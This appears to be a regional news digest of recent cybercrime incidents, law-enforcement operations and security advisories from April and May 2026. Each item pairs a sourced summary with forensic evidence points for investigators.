Europol said Austrian and Albanian authorities dismantled call centres linked to a EUR 50 million online fraud case, with searches and seizures across Europe [EMEA]. The case matters for investigators because seized cash and IT infrastructure can connect victim reports, payment trails, operator accounts and communications evidence across jurisdictions (Source: Europol, 30-04-2026).

German authorities suspect Russia-linked operators used Signal phishing against senior officials, military personnel and journalists, with reporting describing about 300 affected accounts [EMEA]. Investigators should prioritise chat-token artefacts, device-linking events, phishing bot infrastructure and cross-platform account recovery logs to preserve attribution signals and assess message exposure (Source: AP, 28-04-2026).

Singapore media reported that Shanghai Tunnel Engineering Co Singapore suffered a cybersecurity incident affecting data tied to Jurong Region Line stations and the Changi NEWater Factory 3 project [APAC]. The investigation requires correlation between contractor systems, project repositories, access-control records and client-side notifications to identify compromised datasets and downstream infrastructure exposure (Source: The Straits Times, 28-04-2026).

Winona County officials said data stolen during an earlier ransomware attack was released by the criminals, escalating the incident from service disruption to confirmed data exposure [AMER]. Investigators now need to compare leak-site material with internal file inventories, preserve ransom communications and document notification evidence for affected residents and county systems (Source: GovTech, 30-04-2026).

Itron disclosed that attackers accessed internal IT systems, with the utility technology supplier saying it detected the April intrusion and blocked further malicious activity [AMER]. The filing is significant because forensic review must verify segmentation between corporate systems, customer platforms and operational technology dependencies used by utilities in more than 100 countries (Source: TechRadar, 28-04-2026).

Medtronic confirmed a cyberattack on its corporate IT network and said manufacturing, distribution, product safety and patient services were not disrupted [AMER]. Investigators should validate that separation through network telemetry, identity logs and endpoint evidence, especially where medical-device supply chains depend on trusted corporate services for support and logistics (Source: Reuters, 28-04-2026).

ASD’s ACSC warned that CVE-2026-41940 in cPanel and WHM is being actively exploited in Australia, enabling authentication bypass and potential remote code execution [APAC]. The advisory gives investigators immediate triage points: exposed control-panel interfaces, patched status after 30 April, web access logs and any post-authentication artefacts created by unauthorised sessions (Source: ASD ACSC, 01-05-2026).

Dark Reading reported that TeamPCP compromised npm packages used in SAP cloud application development, injecting malicious preinstall scripts into the software supply chain [GLOBAL]. The campaign matters because package-lock files, developer workstation telemetry, CI pipeline logs and registry-download records may be the strongest evidence for tracing exposure and secondary credential theft (Source: Dark Reading, 30-04-2026).

Europol said Swiss authorities arrested 10 people in action against the Black Axe criminal organisation, including a suspected senior figure, after searches across several cantons [EMEA]. The operation gives investigators fresh opportunities to correlate seized devices, financial ledgers, messaging accounts and victim complaints tied to transnational fraud and organised cyber-enabled crime (Source: Europol, 29-04-2026).

Europol reported that a Danish-French Terrorgram network member was sentenced in Denmark to six years for terrorism-related offences following international cooperation [EMEA]. Digital investigators can use the case as a reminder that extremist-network prosecutions often turn on platform attribution, device ownership, content preservation, translation integrity and chain-of-custody handling (Source: Europol, 01-05-2026).

The UK government published its Cyber Security Breaches Survey 2025/2026, reporting persistent breach and attack exposure among businesses, charities and education institutions [EMEA]. For investigation leaders, the findings support readiness benchmarks around logging, vulnerability assessment, reporting routes and evidence capture before incidents become regulatory or insurance disputes (Source: GOV.UK, 30-04-2026).

ASD’s ACSC published new joint guidance on careful adoption of agentic AI services, warning that autonomous tools introduce security and resilience risks [APAC]. Investigation teams should convert the guidance into evidential requirements for agent actions, prompt histories, delegated credentials, audit logs and human approval records when AI systems affect business decisions (Source: ASD ACSC, 01-05-2026).